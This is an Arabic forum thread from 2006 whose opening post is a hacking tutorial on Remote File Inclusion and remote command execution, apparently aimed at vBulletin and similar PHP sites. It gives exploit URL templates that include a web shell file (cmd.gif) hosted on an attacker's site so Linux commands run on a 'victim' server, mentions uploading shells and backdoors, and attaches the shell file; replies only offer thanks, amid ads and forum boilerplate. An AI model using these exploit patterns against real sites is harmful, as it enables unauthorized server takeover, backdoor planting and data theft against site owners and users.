منتديات  

العودة   منتديات مدرسة المشاغبين > منتدى الكمبيوتر برامج محمول اجهزة تعليم كمبيوتر computer حاسوب كل مفيد للكمبيوتر و للانترنت > الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus

الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus الحماية من الهكرز والاختراق و الفايروسات وسرقة البريد

ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله - اللهم اني اسالك الهدى والتقى والعفاف والغنى

حراج سيارات 19-4-1431هـ عطور خاصة مخلطات نادرة عطور فرنسية لوشن للجسم 28-12-1430 ورد الروح ينتهي في 1-4-1431هـ
منتديات مهجة ينبع 18-1-1430 ه
للاعلان الاتصال بجوال 0555055075   بدر للاعلان - بدر - 0507445115 عقارية المدينة 6-12-1430هـ

روابط مهمة و مفيدة : لاستعادة الباسورد الرقم السري || كيف يتم تفعيل الاشتراك || طلب كود تفعيل العضوية على البريد
استضافة مواقع معنى كلمة رسائل مسجات دردشة شات افلام مقاطع فلم مقطع
مكتبة فلاش اسلامي الثقافة الجنسية صور في صورة شات صوتي الأسره المسلمه
ابتسامات خلفيات العاب جديدة دليل مواقع احداثيات gps القرآن الكريم
بطاقات كروت جوال موبايل جافا java قصص روايات sitemap
كتب الكترونية ماسنجر في مسنجر خطوط وصلات روابط العاب بنات للبنات فقط


( تعلم ثغرات ) Remote File Inclusion + commands execution

الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus


إضافة رد
 
أدوات الموضوع طريقة عرض الموضوع
  #1 (permalink)  
قديم 02-09-2006, 06:29 AM
جاي معه ملفه
 
تاريخ التسجيل: May 2005
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 20
العمر : 32
الاوسمة :
رقص ( تعلم ثغرات ) Remote File Inclusion + commands execution

بسم الله الرحمن الرحيم


شباب اليوم موضوعنا عن الثغرات التي من نوع

Remote File Inclusion

commands execution


وراح أشرح إستخدامها بالتفصيل إن شاء الله لأنها خطيره ورائعه

وكثير من البرامج المشهوره لدينا أصيبت بمثلها

مثل منتدى vBulletin وغيره

بسم الله نبدأ :

commands execution

معناه تقدر تنفذ أوامر لينكس

يعني إذا وجدة في بعض الثغرات أن نوعيتها commands execution

فاعرف انك تستطيع عن طريق الثغرة تطبيق أوامر اللينكس

وهذا شيء ممتاز يعني تقدر ترفع شل على الموقع اللي فيه الثغره

أو ترفع باكدور أو اللي تبيه لأن الثغره تسمح لك بتنفيذ أوامر لينكس على السيرفر

وطريقة إستعمال مثل هذه الثغرات سهل وكل اللي عليك هو وضع الأمر اللذي تريده

الأن ناخذ الثغره تبع منتديات VB الجيل الثالث
والي رابطها تحصله كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع
شوف الإستغلال :
كود:
http://www.[victim].com/vb/include.php?test=http://attacker
كل اللي عليك إنك تغيير الأمر ( id ) إلى أي أمر لينكس

ومشروح بالموضوع كل شيء بالتفصيل وبالصور
=====
Remote File Inclusion
أيضاً تستطيع عن طريقها تطبيق أوامر اللينكس

لكن لازم يكون عندك ملف مثل هذا cmd.gif وهو اللي يخليك تنفذ أوامر اللينكس

على الموقع الضحيه

وتكون رافعه على موقعك الشخصي

الأن :

لنفرض أنك وجدت في أحد مواقع الحماية ثغره ووجدت

إستغلالها هكذا
كود:
http://www.[victim].com/vb/include.php?test=http://attacker
ولنفرض أن الموقع اللي عليه cmd.gifهو هذا
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع
يعني سيصبح الرابط في المتصفح هكذا
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع
لاحظ ماذا أضفنا ?&cmd=order

مكان كلمة order تضع أوامر لينكس ولنفرض أنك تريد معرفة صلاحياتك على الموقع الضحية

يعني أنك ستستخدم الأمر id لمعرفة الصلاحيات

وهذا يعني أن الرابط سيصبح هكذا
كود:
http://www.(hacker).com/vb/include.php?test=http://www.(hacker).com/cmd.gif?&cmd=id
وهذا طبعاً مثال لمعرفة كيفية تطبيق مثل هذه الثغرات

والأن لنأخذ مثال أخر ونشرحه بالتفصيل
كود:
http://[victim]/page.php?test=http://attacker
victim معروف وهو الموقع الضحية

page.php الصفحه التي يوجد بها الثغره

page.php?test الخطأ المسبب للثغره

attacker وهو الموقع المهاجم وهو موقعك الذي سيكون عليه الملف cmd.gif


وهذا يعني أن الرابط الذي سوف تستخدمه في الإختراق سوف يصبح هكذا
كود:
http://www.aaa.com/page.php?test=http://www.attaker.com/cmd.gif?&cmd=id
وطبعاً هناك ملفات أخرى غير cmd.gif تسمح لك بتنفيذ أوامر لينكس


والأن مو باقي عليك الا تعرف اوامر اللينكس وعملها

وهذي تلقاها في نفس القسم ابحث تحصلها باذن الله

وهذا موضوع فيه ثغره جديده من نوع Remote File Inclusion
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع
ملاحظة : الملف cmd.gif مرفق
والفرق بين Remote Command Execution و Remote File Inclusion


ان Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الاوامر مكان الاي دي((رابط موقعك مع الاي دي ))

و Remote Command Execution تستخدم اوامر اللينكس على طول بدون كود مرفوع (( الاي دي فقط ))

تحياتي
عذابي غير=zmani
الملفات المرفقة
نوع الملف: zip cmd.zip‏ (140 بايت, المشاهدات 84)


من مواضيعي في الموقع على قسم 0 ( تعلم ثغرات ) Remote File Inclusion + commands execution
0 إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي
0 :::::مطللوووب:::::
0 شرح اوامر الشيل (اساسيات)اوامر لينكس
0 :::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل:::::

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس

الان اخر العروض التجارية والتخفيضات على السفر والسياحة والفنادق والهواتف المحمولة والازياء والموضه والسيارات وغيرها الكثير على موقع لقطه
www.logta.com

لقطه دليلك التجاري

  #2 (permalink)  
قديم 02-09-2006, 02:04 PM
صورة عاشق ميلانو
اداري سابق
 
تاريخ التسجيل: Nov 2005
البلد - المكان و السكن : االسعودية
السيرة :
هواية : كرة القدم
وظيفة - عمل: لاشي
جنس : ولد
جنسية : سعودي
موقع : منتديات الفتح
جوال موبايل : الدمعة
مشاركات : 4,402
العمر : 16
الاوسمة :
يسلموووووووووو على الشرح


من مواضيعي في الموقع على قسم 0 من يقدر يسويها
0 الصورة التي ادهشت العالم كله ...!!!!
0 مايرد الكريم الا اللئيم
0 كاكا قد يغيب عن مباراة اليوفنتوس بعد غيابه عن تدريبات الفريق اليوم
0 مين افضل قائد في الدوري الانجليزي
0 مهارات لاعبي نادي ميلان (فيديو)

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #5 (permalink)  
قديم 02-16-2006, 11:47 PM
صورة هاك بلو
مرابط بالمدرسه
 
تاريخ التسجيل: Nov 2005
البلد - المكان و السكن : السعوديه ((الدمام))
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 402
العمر : 27
الاوسمة :
يعطيك العافيه على الشرح
أخوك هاك بلو


من مواضيعي في الموقع على قسم 0 MSN messenger 8.0 + Patch
0 اخر اصدار لبرنامج الحماية الخارق
0 احدث طرق الاختراق
0 أنتبه من الرسائل على الاميل بشكل هذه ((صوره))
0 كتاب عن الهاكرز بعربي
0 آخراصدار من برنامج الحماية الخارق Deep Freeze Enterprise Full 5.5

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
إضافة رد

أدوات الموضوع
طريقة عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر رد
هل تعلم أن أول ما نفخ الروح في آدم عليه السلام؟ abash المنتدى الاسلامى 15 07-20-2009 06:12 PM
هل تعلم ان المعلومات<<مفيدة شهيد الرمش منتدى الجريمه حوادث كوارث جرائم احداث عالميه وقضايا ساخنه الاتجاه المعاكس 9 09-14-2005 04:01 AM
هل تعلم زغلول بيه المنتدى الاسلامى 4 04-11-2003 04:16 PM


الساعة الآن توقيت السعودية الرياض جدة الشرقية القصيم 08:59 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd diamond
للإعلان بالموقع    |    اتصـل بنــا - About

جامعة الامام 28-1-1431 الجامعة الاسلامية 28-1-1431 جامعة نجران 2-6-1431

SEO by vBSEO 3.2.0